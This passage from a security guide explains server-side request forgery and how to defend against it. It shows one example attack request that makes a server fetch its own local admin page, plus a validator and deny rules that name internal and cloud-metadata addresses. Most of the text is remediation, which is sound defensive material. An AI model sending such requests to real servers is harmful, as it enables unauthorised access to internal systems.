Some web applications restrict admin panels or internal APIs based on IP address (e.g., only accessible from 127.0.0.1).

If SSRF is present, an attacker can force the vulnerable server to make a local request on their behalf, bypassing these restrictions:

GET /fetch?url=http://127.0.0.1/admin

If the application is misconfigured, the attacker can now access internal admin functionality remotely.
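
The core defence is to validate any user-supplied URL before the server fetches it. The following minimal Python sketch (the function name is illustrative) resolves the hostname and rejects loopback, link-local, private, and reserved addresses, in line with the remediation steps below:

import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        return False
    try:
        resolved = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for _family, _type, _proto, _name, sockaddr in resolved:
        addr = ipaddress.ip_address(sockaddr[0].split("%")[0])  # drop IPv6 zone id if present
        if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_reserved:
            return False
    return True

print(is_safe_url("http://169.254.169.254/latest/meta-data/"))  # False (link-local)
print(is_safe_url("http://127.0.0.1/admin"))                    # False (loopback)

Note that a complete defence also pins the resolved address when the outbound request is actually made; otherwise DNS rebinding between the check and the fetch can bypass it.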

Remediation

  1. Block Requests to Internal IP Ranges

    • Restrict access to internal networks (127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).

    • Example rule (pseudocode) to deny requests whose target resolves to an internal range:

      if request.url resolves to 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8,
         172.16.0.0/12, or 192.168.0.0/16 {
           block request;
      }
      
  2. Validate and Restrict Outbound Requests

    • Whitelist only trusted domains instead of allowing open URL input.

    • Reject requests containing IP addresses, localhost, or internal services.

    • Example regex filter:

      ^(https?:\/\/(www\.)?trusted-domain\.com\/.*)$
      
  3. Use a Proxy for Outbound Requests

    • Route all requests through a secure outbound proxy that enforces domain whitelisting.
    • Block direct requests to internal network resources.
  4. Enforce Network Segmentation

    • Prevent web servers from directly accessing internal applications or cloud metadata services.
    • Use VPC security groups and firewall rules to restrict server-to-server communication.
  5. Disable Unnecessary Internal Services

    • Shut down or firewall off internal services (e.g., Jenkins, Redis, Elasticsearch) that do not need to be reachable from the application servers.
    • Require authentication and IP whitelisting for internal web applications.